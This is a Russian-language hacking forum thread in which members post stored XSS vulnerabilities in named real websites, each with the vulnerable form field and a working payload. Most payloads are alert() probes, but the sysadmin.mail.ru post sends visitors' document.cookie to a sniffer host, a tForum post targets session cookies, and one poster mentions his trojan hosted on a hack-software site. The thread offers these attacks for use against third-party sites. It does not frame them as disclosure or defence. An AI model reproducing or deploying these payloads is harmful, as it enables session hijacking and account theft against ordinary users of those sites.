Тут постим тока активные XSS. Так же сайт на котором вы нашли xss должен быть более или менее популярным: 1. Он не должен быть расположен на бесплатном хостинге. 2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще. Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы.
Сайт с хак-софтом, там и мой трой лежит)) samouchka.net - когда коммент добавляешь впиши. <img src=http://samouchka.net/engine/data/emoticons/sad.gif onload=XSS]
www.jjurnal.ru Довольно популярный жж. Постим сообщение от анонимного пользователя. Уязвимо поле "Имя:" "><script>alert()</script> Работает в опере и ие.
email.ru может и было..ибо XSS самая тупая)) .. отправляем письмо ..естестн в html.... Code: <script>alert()</script> или Code: <img src=javascript:alert()>
proplay.ru proplay.ru Идём в раздел "Команды": --http://www.proplay.ru/team/ Там создаём новую команду. Уязвимыми являются поля: -Игры -IRC канал -Домашняя страница Test: --http://www.proplay.ru/team/744/
sysadmin.mail.ru Заходи на sysadmin.mail.ru..... Сморим *Сервисы Сисадмина* там лезим в *Моя регистрационная анкета* в поле Крупный город: Выбираем любой город)) далее в поле Свой город/район: строчим Code: "><script>img = new Image(); img.src = "http://сайт.ru/сниффер.gif?"+document.cookie;</script> и жмём Сохранить изменения... после переходим в Whois ..находим наш город...если в списке ников есть наш ник.....значит куки уже на снифе))ибо ненадо даже давать ссылку на свой профиль...просто на город где ваш логин))
www.qiq.ru После регистрации, в профиле изменяем уязвимые поля, а именно: 1)Место жительства 2)О себе А этих местах пишем Code: "><script>alert(/xss/)</script> Пример
ДОМ 3 ХЭК =)))))) dom3mir.ru Регистрируемся с любыми данными...... Далее идем изменять свою анкету... В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете Code: Москва" onmouseover="alert('xss')" Далее идете в поиск...ищите себя понику и вот xss =)
http://www.ohizba.ru/index.php?type=page&id=13 уязвимы все поля в гостевой книге фуфло, но баг.. //updat3: Code: http://www.autolider.info/news/main.php?id=108&cpage=1 уязвимость в поле "name" в комментах извините, редактирование не пашет.. если я что-то нарушил, соедините плз посты запахало)
splashblog.com Блоггер фоток. Заливаем новую фотку. Уязвимо поле "Caption:" Code: "><script>alert();</script> Работает в ие и опере.
http://rock-rus.com.ru/users.php в регистрации пишем мыло Code: [email protected]"><script>alert('alert')</script>
icq.com Заходим на форумы или в группы, создаем голосование. Уязвимы поля "Answer..." Code: <script>alert(1);</script> Получилось голосование и теперь, когда кто-либо будет голосовать за пункт с алертом - то будут выскакивать все алерты (дапустим вы поставили алерты на все ансверы))) Работает в ие и опере.
meta.ua Идем в блог, создаем комментарий Code: <script>alert(10);</script> и при ответе на этот коментарий вылезает алерт. Работает в ие и опере.
comby.ru Везде где можно оставить комментарий: Code: <img src=javascript:alert()> вылезет алерт. Работает в ие и опере.
http://planeta.solo.by/- геймерский сайт провайдера. В личку написать: <img src=fuck onerror=alert(\'xss\')
tForum <= b0.915 Форум малораспространённый, но всё же. Активная XSS в поле "Message". Code: http://www.target/path/message.php Вставляем в поле "Message": Code: [img]javascript:alert(document.cookie)[/img] В кукисах сессия, логин.
Отморозки ============= Otmorozki.org ============= Заходим в любую новость пишем комментарий... Уязвимое поле "тема" ..вот там и пишем наш кодик.. Code: "><script>alert("Отморозки вас похекале")</script> Теперь ваша уязвимость ( xss ) будет гулять везде))Даже на главной странице
Warcraft ============= Games.mipt.ru/wc3/ ============= Уязвимые поля при регистрации: "Полное имя" "О пользователе" "Дом.страница" Вставляем туда код Code: "><script>alert("Mipt \nВас похекале....\nУязвимость на вашем сайте нашел я, Isis \nРеспект всему античату \nА также отдельный респект:\n gemaglabin\n Great\n blackybr\n ettee\n and etc..... Гыгы \n Короче вас похекале :))) ")</script> И вот пример.....просмотр моего профиля Isis
